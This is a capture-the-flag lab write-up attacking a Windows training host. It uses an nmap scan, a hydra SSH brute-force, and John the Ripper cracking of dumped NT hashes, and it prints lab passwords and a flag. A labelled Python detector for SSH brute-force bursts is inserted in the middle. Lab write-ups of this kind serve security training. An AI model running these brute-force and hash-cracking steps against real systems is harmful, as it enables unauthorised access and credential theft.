Attacking IP: 10.10.40.4
Victim IP: target.ine.local - 10.3.20.187
creds:
alice:princess1
david:orange
A target machine is accessible at target.ine.local. Identify the services and capture the flags.
nmap -sV -sC 10.3.26.200
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-01 19:53 IST
Nmap scan report for target.ine.local (10.3.26.200)
Host is up (0.0032s latency).
Not shown: 990 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=WIN-GQ7PTVEC6HL
| Not valid before: 2025-12-31T14:13:35
|_Not valid after: 2026-07-02T14:13:35
|_ssl-date: 2026-01-01T14:24:54+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: WIN-GQ7PTVEC6HL
| NetBIOS_Domain_Name: WIN-GQ7PTVEC6HL
| NetBIOS_Computer_Name: WIN-GQ7PTVEC6HL
| DNS_Domain_Name: WIN-GQ7PTVEC6HL
| DNS_Computer_Name: WIN-GQ7PTVEC6HL
| Product_Version: 6.3.9600
|_ System_Time: 2026-01-01T14:24:47+00:00
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-01-01T14:24:48
|_ start_date: 2026-01-01T14:13:25
We should note the OpenSSH port open on this Windows machine. It is likely used by an admin for remote management and makes a good initial target for us. The task gives us the username alice, and since port 22 is open we can use a tool like hydra to brute-force the login and recover her password.
hydra -l alice -P /usr/share/wordlists/metasploit/unix_passwords.txt target.ine.local ssh
[22][ssh] host: target.ine.local login: alice password: princess1
Success!
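As an added example (not part of the original writeup), here is the defender's side of the hydra step above: a small Python detector that reads sshd log lines and alerts when one source produces a burst of failed passwords, and again when that same source then logs in successfully. The log lines are constructed; the `sshd.exe:` timestamp prefix and the sample addresses are assumptions, while the "Failed/Accepted password for ... from ... port ..." text is sshd's standard message format.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# sshd's standard auth messages; the leading timestamp and "sshd.exe:" prefix
# are an assumption about how the Windows server's log file is written.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) .*?"
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d+\.\d+\.\d+\.\d+) port \d+"
)

THRESHOLD = 5                    # failures from one source ...
WINDOW = timedelta(seconds=60)   # ... within this sliding window

def detect_bruteforce(lines, threshold=THRESHOLD, window=WINDOW):
    """Return alert strings for guessing bursts and for a success that follows one."""
    failures = defaultdict(deque)   # src -> timestamps of recent failed logins
    flagged = set()                 # sources already reported as bursting
    alerts = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue                # not an auth result line
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        src, user = m["src"], m["user"]
        recent = failures[src]
        if m["result"] == "Failed":
            recent.append(ts)
            while recent and ts - recent[0] > window:   # drop failures outside the window
                recent.popleft()
            if len(recent) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(f"brute-force: {len(recent)} failed logins from {src} "
                              f"within {window.seconds}s (last user tried: {user})")
        elif src in flagged:
            # A guessed password: the attacker's source now authenticates.
            alerts.append(f"success after brute-force: {user} from {src}")
    return alerts

# Constructed sample log: a legitimate login from one host, a guessing burst from another.
SAMPLE_LOG = """\
2026-01-01 14:19:59 sshd.exe: Server listening on 0.0.0.0 port 22.
2026-01-01 14:20:01 sshd.exe: Failed password for alice from 10.10.40.4 port 51001 ssh2
2026-01-01 14:20:01 sshd.exe: Failed password for alice from 10.10.40.4 port 51002 ssh2
2026-01-01 14:20:02 sshd.exe: Failed password for alice from 10.10.40.4 port 51003 ssh2
2026-01-01 14:20:02 sshd.exe: Accepted password for david from 10.3.20.5 port 40112 ssh2
2026-01-01 14:20:03 sshd.exe: Failed password for alice from 10.10.40.4 port 51004 ssh2
2026-01-01 14:20:03 sshd.exe: Failed password for alice from 10.10.40.4 port 51005 ssh2
2026-01-01 14:20:04 sshd.exe: Failed password for alice from 10.10.40.4 port 51006 ssh2
2026-01-01 14:20:05 sshd.exe: Accepted password for alice from 10.10.40.4 port 51007 ssh2
""".splitlines()

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

Note that the unrelated successful login by david is not reported: only a success from a source that has already crossed the failure threshold is treated as a likely guessed password.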
Now we can SSH to port 22 with those credentials.
Directory of C:\Users\alice
01/01/2026 02:14 PM <DIR> .
01/01/2026 02:14 PM <DIR> ..
09/05/2020 07:55 AM <DIR> Contacts
09/05/2020 09:07 AM <DIR> Desktop
06/19/2024 11:42 AM <DIR> Documents
09/05/2020 09:11 AM <DIR> Downloads
09/05/2020 07:55 AM <DIR> Favorites
01/01/2026 02:14 PM 34 flag1.txt
06/20/2024 05:28 AM 2,416 hashdump.txt
09/05/2020 07:55 AM <DIR> Links
09/05/2020 07:55 AM <DIR> Music
09/05/2020 07:55 AM <DIR> Pictures
09/05/2020 07:55 AM <DIR> Saved Games
09/05/2020 07:55 AM <DIR> Searches
09/05/2020 07:55 AM <DIR> Videos
2 File(s) 2,450 bytes
13 Dir(s) 360,873,984 bytes free
alice@WIN-GQ7PTVEC6HL C:\Users\alice>type flag1.txt
5d4223ee70c04de7ac078013f629dcb5
Great, we check her directory and find the first flag. We also see an interesting hashdump.txt file that’s likely needed for a future task.
We can simply copy the hashes we found into a text file back on our attacking machine.
Next we use John the Ripper to crack the hashes and find one more password, for the user david.
john --format=nt --wordlist=/usr/share/wordlists/metasploit/unix_passwords.txt hashes.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 30 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=48
Press 'q' or Ctrl-C to abort, almost any other key for status
princess1 (alice)
orange (david)